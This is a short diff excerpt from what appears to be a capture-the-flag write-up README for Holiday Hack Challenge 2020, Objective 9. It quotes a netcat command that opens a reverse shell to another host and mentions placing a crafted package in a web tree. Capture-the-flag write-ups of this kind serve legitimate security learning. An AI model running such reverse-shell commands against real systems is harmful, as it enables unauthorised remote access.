joergschwarzwaelder/hhc2020/Objective-9/README.md

 `/bin/nc 10.6.0.2 4444 -e /bin/bash`
 an interactive reverse shell can be acquired.

-The snippet below automatically inserts the correct IP address of the local host and places the package in the right location of the web tree:
+The snippet below automatically inserts the correct IP address of the local host and places the package in the right location of the web tree.

+**Obtaining just the file**
 ```
 cd ~/debs
 mkdir tmp